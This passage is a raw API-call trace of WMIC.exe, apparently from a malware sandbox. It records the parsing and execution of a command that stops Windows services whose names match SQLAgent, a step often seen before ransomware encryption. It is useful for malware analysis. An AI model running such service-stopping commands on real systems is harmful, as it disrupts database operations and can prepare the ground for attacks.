(_Size=0xc) returned 0x79acd8 [0275.616] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.617] SysStringLen (param_1="TABLE") returned 0x5 [0275.617] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.617] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.617] SysStringLen (param_1="XML") returned 0x3 [0275.617] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.617] SysStringLen (param_1="texttablewsys") returned 0xd [0275.617] SysStringLen (param_1="XML") returned 0x3 [0275.617] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.617] malloc (_Size=0x18) returned 0x792d20 [0275.617] IUnknown:Release (This=0x776b88) returned 0x0 [0275.617] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.617] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.617] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=16, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.617] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="htable.xsl") returned 0x0 [0275.617] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.617] malloc (_Size=0xc) returned 0x79ade0 [0275.617] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.617] free (_Block=0x79ade0) [0275.617] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0275.617] malloc (_Size=0xc) returned 0x79ad08 [0275.618] malloc (_Size=0xc) returned 0x79adc8 [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] SysStringLen (param_1="TABLE") returned 0x5 [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] SysStringLen (param_1="XML") returned 0x3 [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] SysStringLen (param_1="texttablewsys") returned 0xd [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0275.618] SysStringLen (param_1="XML") returned 0x3 [0275.618] SysStringLen (param_1="htable-sortby") returned 0xd [0275.618] malloc (_Size=0x18) returned 0x792d40 [0275.618] IUnknown:Release (This=0x776b88) returned 0x0 [0275.618] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.618] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.618] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=17, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.618] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="mof.xsl") returned 0x0 [0275.618] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.618] malloc (_Size=0xc) returned 0x79acf0 [0275.618] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.619] free (_Block=0x79acf0) [0275.619] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0275.619] malloc (_Size=0xc) returned 0x79acf0 [0275.619] malloc (_Size=0xc) returned 0x79ab58 [0275.619] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.619] SysStringLen (param_1="TABLE") returned 0x5 [0275.619] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.619] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.619] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.619] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.619] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.619] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.619] malloc (_Size=0x18) returned 0x792a20 [0275.619] IUnknown:Release (This=0x776b88) returned 0x0 [0275.619] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.619] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.619] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=18, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.619] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="mof.xsl") returned 0x0 [0275.619] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.619] malloc (_Size=0xc) returned 0x79ab70 [0275.620] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.620] free (_Block=0x79ab70) [0275.620] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0275.620] malloc (_Size=0xc) returned 0x79ade0 [0275.620] malloc (_Size=0xc) returned 0x79abd0 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] SysStringLen (param_1="TABLE") returned 0x5 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0275.620] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.620] SysStringLen (param_1="wmiclimofformat") returned 0xf [0275.620] malloc (_Size=0x18) returned 0x792d60 [0275.620] IUnknown:Release (This=0x776b88) returned 0x0 [0275.620] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.620] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.621] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=19, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.621] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="textvaluelist.xsl") returned 0x0 [0275.621] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.621] malloc (_Size=0xc) returned 0x79ab70 [0275.621] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.621] free (_Block=0x79ab70) [0275.621] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0275.621] malloc (_Size=0xc) returned 0x79ab70 [0275.621] malloc (_Size=0xc) returned 0x79ac30 [0275.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.621] SysStringLen (param_1="TABLE") returned 0x5 [0275.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.621] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.621] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.621] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.621] malloc (_Size=0x18) returned 0x792a00 [0275.622] IUnknown:Release (This=0x776b88) returned 0x0 [0275.622] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.622] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.622] IXMLDOMNodeList:get_item (in: This=0x779ca0, index=20, listItem=0x1dfa80 | out: listItem=0x1dfa80*=0x776b88) returned 0x0 [0275.622] IXMLDOMNode:get_text (in: This=0x776b88, text=0x1dfa84 | out: text=0x1dfa84*="textvaluelist.xsl") returned 0x0 [0275.622] IXMLDOMNode:get_attributes (in: This=0x776b88, attributeMap=0x1dfa7c | out: attributeMap=0x1dfa7c*=0x779fa8) returned 0x0 [0275.622] malloc (_Size=0xc) returned 0x79aca8 [0275.622] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x779fa8, name="KEYWORD", namedItem=0x1dfa78 | out: namedItem=0x1dfa78*=0x779ff8) returned 0x0 [0275.622] free (_Block=0x79aca8) [0275.622] IXMLDOMNode:get_nodeValue (in: This=0x779ff8, value=0x1dfa38 | out: value=0x1dfa38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0275.622] malloc (_Size=0xc) returned 0x79ac60 [0275.622] malloc (_Size=0xc) returned 0x79ab88 [0275.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.622] SysStringLen (param_1="TABLE") returned 0x5 [0275.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.622] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0275.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.622] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0275.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0275.623] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0275.623] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0275.623] malloc (_Size=0x18) returned 0x7929a0 [0275.623] IUnknown:Release (This=0x776b88) returned 0x0 [0275.623] IUnknown:Release (This=0x779fa8) returned 0x0 [0275.623] IUnknown:Release (This=0x779ff8) returned 0x0 [0275.623] IUnknown:Release (This=0x779ca0) returned 0x0 [0275.623] FreeThreadedDOMDocument:IUnknown:Release (This=0x776b48) returned 0x1 [0275.623] FreeThreadedDOMDocument:IUnknown:Release (This=0x7745a8) returned 0x0 [0275.623] free (_Block=0x799940) [0275.623] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice" [0275.623] malloc (_Size=0xe0) returned 0x79aee8 [0275.623] memcpy_s (in: _Destination=0x79aee8, _DestinationSize=0xde, _Source=0x521b78, _SourceSize=0xd0 | out: _Destination=0x79aee8) returned 0x0 [0275.623] malloc (_Size=0xc) returned 0x79ad68 [0275.623] malloc (_Size=0xc) returned 0x79aba0 [0275.623] malloc (_Size=0xc) returned 0x79aca8 [0275.624] malloc (_Size=0xc) returned 0x79ad50 [0275.624] malloc (_Size=0x80) returned 0x79afd0 [0275.624] GetLocalTime (in: lpSystemTime=0x1dfa1c | out: lpSystemTime=0x1dfa1c*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x29, wMilliseconds=0x2a5)) [0275.624] _vsnwprintf (in: _Buffer=0x79afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1df9fc | out: _Buffer="04-02-2020T08:28:41") returned 19 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] malloc (_Size=0x8c) returned 0x79b058 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] malloc (_Size=0x8c) returned 0x79b0f0 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.624] malloc (_Size=0xa) returned 0x79abb8 [0275.624] lstrlenW (lpString="path") returned 4 [0275.624] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0275.624] malloc (_Size=0xa) returned 0x79ad80 [0275.624] malloc (_Size=0x4) returned 0x792ee8 [0275.625] free (_Block=0x0) [0275.625] free (_Block=0x79abb8) [0275.625] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.625] malloc (_Size=0x1c) returned 0x799da8 [0275.625] lstrlenW (lpString="Win32_Service") returned 13 [0275.625] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0275.625] malloc (_Size=0x1c) returned 0x790568 [0275.625] malloc (_Size=0x8) returned 0x790590 [0275.625] memmove_s (in: _Destination=0x790590, _DestinationSize=0x4, _Source=0x792ee8, _SourceSize=0x4 | out: _Destination=0x790590) returned 0x0 [0275.625] free (_Block=0x792ee8) [0275.625] free (_Block=0x0) [0275.625] free (_Block=0x799da8) [0275.625] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.625] malloc (_Size=0xc) returned 0x79abb8 [0275.625] lstrlenW (lpString="where") returned 5 [0275.625] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0275.625] malloc (_Size=0xc) returned 0x79abe8 [0275.625] malloc (_Size=0xc) returned 0x79ac00 [0275.625] memmove_s (in: _Destination=0x79ac00, _DestinationSize=0x8, _Source=0x790590, _SourceSize=0x8 | out: _Destination=0x79ac00) returned 0x0 [0275.625] free (_Block=0x790590) [0275.625] free (_Block=0x0) [0275.625] free (_Block=0x79abb8) [0275.625] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.625] malloc (_Size=0x36) returned 0x79b188 [0275.625] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0275.625] _wcsicmp (_String1="\"name like '%%SQLAgent%%'\"", _String2="\"NULL\"") returned -20 [0275.625] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0275.625] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0275.625] malloc (_Size=0x36) returned 0x79b1c8 [0275.625] malloc (_Size=0x10) returned 0x79abb8 [0275.625] memmove_s (in: _Destination=0x79abb8, _DestinationSize=0xc, _Source=0x79ac00, _SourceSize=0xc | out: _Destination=0x79abb8) returned 0x0 [0275.625] free (_Block=0x79ac00) [0275.625] free (_Block=0x0) [0275.625] free (_Block=0x79b188) [0275.625] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.626] malloc (_Size=0xa) returned 0x79ac00 [0275.626] lstrlenW (lpString="call") returned 4 [0275.626] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0275.626] malloc (_Size=0xa) returned 0x79ac18 [0275.626] malloc (_Size=0x18) returned 0x792a40 [0275.626] memmove_s (in: _Destination=0x792a40, _DestinationSize=0x10, _Source=0x79abb8, _SourceSize=0x10 | out: _Destination=0x792a40) returned 0x0 [0275.626] free (_Block=0x79abb8) [0275.626] free (_Block=0x0) [0275.626] free (_Block=0x79ac00) [0275.626] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 69 [0275.626] malloc (_Size=0x18) returned 0x792ae0 [0275.626] lstrlenW (lpString="stopservice") returned 11 [0275.626] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0275.626] malloc (_Size=0x18) returned 0x792c00 [0275.626] free (_Block=0x0) [0275.626] free (_Block=0x792ae0) [0275.626] malloc (_Size=0x18) returned 0x792ae0 [0275.626] lstrlenW (lpString="QUIT") returned 4 [0275.626] lstrlenW (lpString="path") returned 4 [0275.626] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0275.626] lstrlenW (lpString="EXIT") returned 4 [0275.626] lstrlenW (lpString="path") returned 4 [0275.626] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0275.626] free (_Block=0x792ae0) [0275.626] WbemLocator:IUnknown:AddRef (This=0x5348d0) returned 0x2 [0275.626] malloc (_Size=0x18) returned 0x792ae0 [0275.626] lstrlenW (lpString="/") returned 1 [0275.626] lstrlenW (lpString="path") returned 4 [0275.626] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0275.626] lstrlenW (lpString="-") returned 1 [0275.626] lstrlenW (lpString="path") returned 4 [0275.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0275.627] lstrlenW (lpString="CLASS") returned 5 [0275.627] lstrlenW (lpString="path") returned 4 [0275.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0275.627] lstrlenW (lpString="PATH") returned 4 [0275.627] lstrlenW (lpString="path") returned 4 [0275.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0275.627] lstrlenW (lpString="/") returned 1 [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0275.627] lstrlenW (lpString="-") returned 1 [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] malloc (_Size=0x1c) returned 0x799da8 [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x2e22688a | out: _String="Win32_Service", _Context=0x2e22688a) returned="Win32_Service" [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] malloc (_Size=0x1c) returned 0x79b188 [0275.627] lstrlenW (lpString="Win32_Service") returned 13 [0275.627] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x2e22688a | out: _String=0x0, _Context=0x2e22688a) returned 0x0 [0275.627] lstrlenW (lpString="") returned 0 [0275.627] lstrlenW (lpString="WHERE") returned 5 [0275.628] lstrlenW (lpString="where") returned 5 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0275.628] lstrlenW (lpString="/") returned 1 [0275.628] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLAgent%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0275.628] lstrlenW (lpString="-") returned 1 [0275.628] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLAgent%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0275.628] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0275.628] malloc (_Size=0x32) returned 0x79b208 [0275.628] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0275.628] lstrlenW (lpString="/") returned 1 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0275.628] lstrlenW (lpString="-") returned 1 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] malloc (_Size=0xa) returned 0x79abb8 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] lstrlenW (lpString="GET") returned 3 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0275.628] lstrlenW (lpString="LIST") returned 4 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0275.628] lstrlenW (lpString="SET") returned 3 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0275.628] lstrlenW (lpString="CREATE") returned 6 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0275.628] lstrlenW (lpString="CALL") returned 4 [0275.628] lstrlenW (lpString="call") returned 4 [0275.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0275.628] lstrlenW (lpString="/") returned 1 [0275.628] lstrlenW (lpString="stopservice") returned 11 [0275.629] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0275.629] lstrlenW (lpString="-") returned 1 [0275.629] lstrlenW (lpString="stopservice") returned 11 [0275.629] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0275.629] lstrlenW (lpString="stopservice") returned 11 [0275.629] malloc (_Size=0x18) returned 0x792b00 [0275.629] lstrlenW (lpString="stopservice") returned 11 [0275.629] ??0CHString@@QAE@XZ () returned 0x1dd8e4 [0275.629] GetCurrentThreadId () returned 0x1228 [0275.629] GetCurrentThreadId () returned 0x1228 [0275.629] ??0CHString@@QAE@XZ () returned 0x1dd86c [0275.629] malloc (_Size=0x4) returned 0x792ee8 [0275.629] malloc (_Size=0xc) returned 0x79ac00 [0275.629] malloc (_Size=0xc) returned 0x79aeb8 [0275.629] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5348d0, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x53b180) returned 0x0 [0275.693] free (_Block=0x79aeb8) [0275.693] CoSetProxyBlanket (pProxy=0x53b180, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0275.693] free (_Block=0x792ee8) [0275.693] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0275.693] free (_Block=0x79ac00) [0275.693] malloc (_Size=0xc) returned 0x79ac00 [0275.694] IWbemServices:GetObject (in: This=0x53b180, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1dd8fc*=0x0, ppCallResult=0x0 | out: ppObject=0x1dd8fc*=0x590a90, ppCallResult=0x0) returned 0x0 [0275.786] free (_Block=0x79ac00) [0275.786] IWbemClassObject:BeginMethodEnumeration (This=0x590a90, lEnumFlags=0) returned 0x0 [0275.786] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="StartService", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x590c88) returned 0x0 [0275.786] lstrlenW (lpString="StartService") returned 12 [0275.786] lstrlenW (lpString="stopservice") returned 11 [0275.786] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0275.786] IUnknown:Release (This=0x590c88) returned 0x0 [0275.786] IWbemClassObject:NextMethod (in: This=0x590a90, lFlags=0, pstrName=0x1dd908*=0x0, ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x0 | out: pstrName=0x1dd908*="StopService", ppInSignature=0x1dd904*=0x0, ppOutSignature=0x1dd900*=0x590c88) returned 0x0 [0275.786] lstrlenW (lpString="StopService") returned 11 [0275.786] lstrlenW (lpString="stopservice") returned 11 [0275.787] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0275.787] malloc (_Size=0x38) returned 0x79b9b8 [0275.787] ??0CHString@@QAE@XZ () returned 0x1dd44c [0275.787] GetCurrentThreadId () returned 0x1228 [0275.787] IWbemClassObject:GetNames (in: This=0x590c88, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x1dd45c | out: pNames=0x1dd45c*="\x01ƀ\x04") returned 0x0 [0275.788] SafeArrayGetLBound (in: psa=0x591340, nDim=0x1, plLbound=0x1dd448 | out: plLbound=0x1dd448) returned 0x0 [0275.788] SafeArrayGetUBound (in: psa=0x591340, nDim=0x1, plUbound=0x1dd444 | out: plUbound=0x1dd444) returned 0x0 [0275.788] SafeArrayGetElement (in: psa=0x591340, rgIndices=0x1dd450, pv=0x1dd460 | out: pv=0x1dd460) returned 0x0 [0275.788] malloc (_Size=0x24) returned 0x79b9f8 [0275.788] IWbemClassObject:GetPropertyQualifierSet (in: This=0x590c88, wszProperty="ReturnValue", ppQualSet=0x1dd370 | out: ppQualSet=0x1dd370*=0x53aa10) returned 0x0 [0275.788] malloc (_Size=0xc) returned 0x79ac00 [0275.788] IWbemQualifierSet:Get (in: This=0x53aa10, wszName="CIMTYPE", lFlags=0, pVal=0x1dd340*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd340*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0275.788] free (_Block=0x79ac00) [0275.788] malloc (_Size=0xc) returned 0x79ac00 [0275.788] IWbemClassObject:Get (in: This=0x590c88, wszName="ReturnValue", lFlags=0, pVal=0x1dd318*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1dd354*=1954620, plFlavor=0x0 | out: pVal=0x1dd318*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1dd354*=19, plFlavor=0x0) returned 0x0 [0275.789] malloc (_Size=0xc) returned 0x79ae28 [0275.789] IWbemQualifierSet:Get (in: This=0x53aa10, wszName="read", lFlags=0, pVal=0x1dd358*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd358*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0275.789] free (_Block=0x79ae28) [0275.789] malloc (_Size=0xc) returned 0x79ae88 [0275.789] IWbemQualifierSet:Get (in: This=0x53aa10, wszName="write", lFlags=0, pVal=0x1dd358*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x1dd358*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0275.789] free (_Block=0x79ae88) [0275.789] malloc (_Size=0xc) returned 0x79ae88 [0275.789] malloc (_Size=0xc) returned 0x79ae40 [0275.789] IWbemQualifierSet:Get (in: This=0x53aa10, wszName="Description", lFlags=0, pVal=0x1dd330*(varType=0x0, 